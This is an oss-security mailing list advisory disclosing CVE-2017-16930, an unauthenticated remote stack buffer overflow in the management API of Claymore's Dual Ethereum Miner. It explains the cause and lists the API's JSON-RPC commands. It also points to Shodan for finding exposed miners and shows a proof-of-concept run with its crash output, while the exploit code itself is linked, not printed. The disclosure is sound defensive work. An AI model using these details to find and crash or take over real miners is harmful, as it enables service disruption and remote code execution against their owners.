Follow @Openwall on Twitter for new release announcements and other news
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <000301d36d47$979bc4b0$c6d34e10$@oststrom.com>
Date: Mon, 4 Dec 2017 22:33:56 +0100
From: "oststrom \(public\)" <pub@...strom.com>
To: <oss-security@...ts.openwall.com>
Subject: CVE-2017-16930 - Claymore's Dual Ethereum Miner unauth stack buffer overflow in remote management interface

VuNote
===================

  Author:       <github.com/tintinweb>
  Ref:
https://github.com/tintinweb/pub/tree/master/pocs/cve-2017-16930
 
https://github.com/tintinweb/pub/tree/master/pocs/cve-2017-16929

  Version:      0.2
  Date:         Nov 30th, 2017

  Tag:          claymore dual ethereum decred crypto currency miner

Overview
--------

  Name:         Claymore's Dual ETH + DCR/SC/LBC/PASC GPU Miner
  Vendor:       nanopool/claymore
  References:   * https://github.com/nanopool/Claymore-Dual-Miner
                * https://bitcointalk.org/index.php?topic=1433925.0

  Version:        10.1 [2]
  Latest Version: 10.1 [2]
  Other Versions: <= 10.1
  Platform(s):    windows, linux
  Technology:     C/C++

  Vuln Classes:   CWE-121: Stack-based Buffer Overflow
  Origin:         remote
  Min. Privs.:    None

  Source:         Closed; runtime protection mechanisms

  CVE:            CVE-2017-16930



Description
---------

A specialized mining solution with remote management interface for mining
ethereum / decred / siacoin / LBRY Credits / pascal coin.

quote website [1][2]

  - Supports new "dual mining" mode: mining both Ethereum and
Decred/Siacoin/Lbry/Pascal at the same time, with no impact on Ethereum
mining speed. Ethereum-only mining mode is supported as well.
  - Effective Ethereum mining speed is higher by 3-5% because of a
completely different miner code - much less invalid and outdated shares,
higher GPU load, optimized OpenCL code, optimized assembler kernels.
  - Supports both AMD and nVidia cards, even mixed.
  - No DAG files.
  - Supports all Stratum versions for Ethereum: can be used directly without
any proxies with all pools that support eth-proxy, qtminer or miner-proxy.
  - Supports Ethereum and Siacoin solo mining.
  - Supports both HTTP and Stratum for Decred.
  - Supports both HTTP and Stratum for Siacoin. Note: not all Stratum
versions are supported currently for Siacoin.
  - Supports Stratum for Lbry and Pascal.
  - Supports failover.
  - Displays detailed mining information and hashrate for every card.
  - Supports remote monitoring and management.
  - Supports GPU selection, built-in GPU overclocking features and
temperature management.
  - Supports Ethereum forks (Expanse, etc).
  - Windows and Linux versions.

Summary
-------

Claymore's Dual ETH miner's remote management interface is prone to an
unauthenticated remote stack buffer overwrite that can be triggered by
simply sending an overly long api request to the management interface
resulting in an unbound `(v)sprintf` style buffer overwrite when trying to
log to file or console.


* unauthenticated
* remote
* stack buffer overwrite

conditions:
* remote management must be enabled: -mport <port>
* also works in read-only mode (-<port>)

Successful exploitation can be turned into:
* DoS - taking profit from crashing the miner
* RCE - execute arbitrary code, silently take over the mining node or host
system.

See PoC ref github.

//Also see: CVE-2017-16929 - Claymore's Dual ETH Miner relative path
traversal in remote management interface [4] //For details see ref github.

Details
-------

Service Discovery:
* shodan: 'eth result' lists about 170-240 publicly available instances [3]
with significant hash power
* banner:


<html><body bgcolor="#000000" style="font-family: monospace;">
{"result": ["10.1 - ETH", "4286", "149336;7492;0",
"30620;29877;28285;30605;29946", "0;0;0", "off;off;off;off;off",
"62;65;51;64;61;75;51;67;62;72", "eth-us-east1.nanopool.org:9999",
"0;1;0;0"]}<br><br><font color="#ff0000">Remote management: read-only mode,
command miner_file ignored </font><br><font color="#00ff00">ETH:
11/22/17-15:28:38 - SHARE FOUND - (GPU 3) ...


Remote Management API overview:

# >nc -L -p 3333
{"id":0,"jsonrpc":"2.0","method":"miner_getstat1"}
{"id":0,"jsonrpc":"2.0","method":"miner_file","params":["epools.txt","<encod
ed>"]}
{"id":0,"jsonrpc":"2.0","method":"miner_getfile","params":["config.txt"]}
{"id":0,"jsonrpc":"2.0","method":"miner_restart"}
{"id":0,"jsonrpc":"2.0","method":"miner_reboot"}
{"id":0,"jsonrpc":"2.0","method":"control_gpu","params":["0", "1"]}
{"id":0,"jsonrpc":"2.0","method":"control_gpu","params":["-1", "0"]}
{"id":0,"jsonrpc":"2.0","method":"control_gpu","params":["0", "2"]}
{"id":0,"jsonrpc":"2.0","method":"miner_file","params":["config.txt","<encod
ed>"]}
{"id":0,"jsonrpc":"2.0","method":"miner_file","params":["dpools.txt","<encod
ed>"]}


EthDcrMiner64 comes with an optional http/tcp based remote management
interface that can be enabled by providing `-mport <[-]port>` as a command
line argument. Providing a negative port starts the remote management
interface in readonly mode. The remote management interfaces request handler
checks for a list of known commands (see Remote Management API overview).
Commands are being logged to file. When the handler encounters an invalid
command a logline like `log(level, "Remote management: unknown command
%s\n", request)` is being emitted. This method internally calls `sprintf`
multiple times writing to a fixed size buffer of `0x4000` (16384) bytes. Any
attempt to log more than `0x4000` bytes us causing a stack buffer overwrite.
There's likely multiple occurrences of the same bug within this software.

//see PoC vector: method, extrafield, psw

See PoC ref github.

Proof of Concept
----------------

Prerequisites:
* compatible AMD/NVidia hardware


RCE:

1. start the miner, specify any pool and the readonly management port 3333
with a management password 123456


#> EthDcrMiner64.exe -epool http://192.168.0.1:8545 -mport -3333

+----------------------------------------------------------------+
|     Claymore's Dual ETH + DCR/SC/LBC/PASC GPU Miner v10.0      |
+----------------------------------------------------------------+

...
Total cards: 1
ETH - connecting to 192.168.0.1:8545
DUAL MINING MODE ENABLED: ETHEREUM+DECRED
DCR: Stratum - connecting to 'pasc-eu2.nanopool.org' <213.32.29.168> port
15555
ETH: HTTP SOLO mode
Ethereum HTTP requests time (-etht) is set to 200 ms Watchdog enabled Remote
management (READ-ONLY MODE) is enabled on port 3333

DCR: Stratum - Connected (pasc-eu2.nanopool.org:15555)
DCR: Authorized
DCR: 11/22/17-22:05:12 - New job from pasc-eu2.nanopool.org:15555

    2. wait for it to initialize
    3. run `poc.py --vector=method localhost:3333` (using the "method"
vector)

#> poc.py 127.0.0.1:3333
[poc.py -             <module>() ][    INFO] --start--
[poc.py -             <module>() ][    INFO] # Claymore's Dual ETH +
DCR/SC/LBC/PASC GPU Miner - Remote Buffer Overwrite
[poc.py -             <module>() ][    INFO] # github.com/tintinweb
[poc.py -         iter_targets() ][ WARNING] shodan apikey missing! shodan
support disabled.
[poc.py -             <module>() ][    INFO] [i] Target: 127.0.0.1:3333
[poc.py -             <module>() ][    INFO] [+] connected.
[poc.py -             <module>() ][    INFO] [+] peer disappeared.
vulnerable!
[poc.py -             <module>() ][ WARNING] error(10054, 'Eine vorhandene
Verbindung wurde vom Remotehost geschlossen')
[poc.py -             <module>() ][    INFO] --done--


4. EthDcrMiner64.exe faults with `INVALID_POINTER_WRITE_EXPLOITABLE` (stack
overwrite, see stacktrace)


GPU0 t=57C fan=0%
Remote management: unknown command miner_getstat1
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
.... <crash>


WinDBG:

%< %< see ref github link. >% >%

Patch
-----

n/A - closed source

Notes
-----

* Timeline

11/22/2017 - vendor contact: report sent
11/23/2017 - vendor response:
             fixed version 10.2 ready and publicly available
             request for 7+ day embargo
12/04/2017 - public disclosure

* Vendor Changelog

Fixed version: v10.2


References
----------

[1] https://github.com/nanopool/Claymore-Dual-Miner
[2] https://bitcointalk.org/index.php?topic=1433925.0
[3] https://www.shodan.io/search?query=eth+result
[4] https://github.com/tintinweb/pub/tree/master/pocs/cve-2017-16929

Contact
-------

https://github.com/tintinweb


Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.